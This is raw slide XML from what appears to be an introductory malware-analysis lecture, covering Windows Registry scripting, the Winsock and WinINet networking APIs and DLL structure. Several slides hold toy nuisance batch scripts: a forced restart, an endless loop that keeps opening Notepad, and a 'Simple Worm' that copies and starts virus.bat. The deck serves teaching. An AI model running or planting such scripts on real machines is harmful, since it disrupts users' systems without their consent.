        <p:nvSpPr>
          <p:cNvPr id="125" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816800" y="2827800"/>
            <a:ext cx="4305960" cy="821880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt; log off the computer</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>@echo off</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>shutdown -r</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4469040"/>
            <a:ext cx="5291640" cy="1096200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="e5dfec"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt; Simple Worm</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>@echo off</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>copy C:\Malwares\virus.bat C:\Malwares</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>start C:\Malwares\virus.bat</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418280" y="3843360"/>
            <a:ext cx="4726440" cy="639720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="97b4e4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="bfcfec"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:grad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CreateObject(“SAPI.SpVoice”).Speak”I love YOU”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163040" y="5187600"/>
            <a:ext cx="4997160" cy="1613880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3b9fba"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;Endless Notepads</a:t>
            </a:r>
            <a:br/>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>@ECHO off</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>:top</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>START %SystemRoot%\system32\notepad.exe</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>GOTO top</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Windows Registry (Code Example)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="641" name="Google Shape;1164;p120" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="323640" y="1234080"/>
            <a:ext cx="8614080" cy="5434920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643"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Registry Scripting by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.reg </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>file</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When a user double-clicks a .</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> file, it automatically modifies the registry by merging the information the file contains into the registry</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="644" name="Google Shape;1171;p121" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1385640" y="3573000"/>
            <a:ext cx="6667920" cy="1503000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Networking API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646"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Windows API functions for network communication</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Berkeley compatible sockets: implemented in the Winsock libraries, primarily in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ws2_32.dll</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="647" name="Google Shape;1178;p122" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971640" y="2696040"/>
            <a:ext cx="7556040" cy="2879640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229320" y="5661360"/>
            <a:ext cx="8729640" cy="1920600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>The WSAStartup function must be called before any other networking functions in order to allocate resources for the networking libraries. When looking for the start of network connections while debugging code, it is useful to set a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>breakpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t> on WSAStartup, because the start of networking should follow shortly.</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Networking API (Code Example)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="651" name="Google Shape;1186;p123" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907640" y="1196640"/>
            <a:ext cx="5040360" cy="5508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Networking API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653"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WinINet API</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Higher-level API </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Stored in</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Wininet.dll</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Implements protocols, such as HTTP and FTP, at the application layer</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>InternetOpen</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: is used to initialize a connection to the Internet.</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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>InternetOpenUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: is used to connect to a URL</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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>InternetReadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: read the data from a file downloaded from the Internet.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000"/>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DLL</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A DLL is an executable file that does not run alone, but exports functions that can be used by other applications</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Malware writers use DLLs in three ways:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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To store malicious code</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By using Windows DLLs</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By using third-party DLLs</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Basic DLL Structure: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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DLLs use the PE file format, and only a single flag indicates that the file is a DLL</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DLLs often have more exports and generally fewer imports</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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DLL example</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="107640" y="1412640"/>
            <a:ext cx="4464000" cy="2286360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solid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 myDLL.c</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#include &lt;stdio.h&gt;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#include “myDLL.h"</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EXPORT void message(){</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printf("Hello World");</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="120240" y="3861000"/>
            <a:ext cx="4450680" cy="1737000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solid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 myDLL.h</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#define EXPORT __declspec(dllexport)</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EXPORT void message (void);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4594320" y="2982600"/>
            <a:ext cx="4450680" cy="2286360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
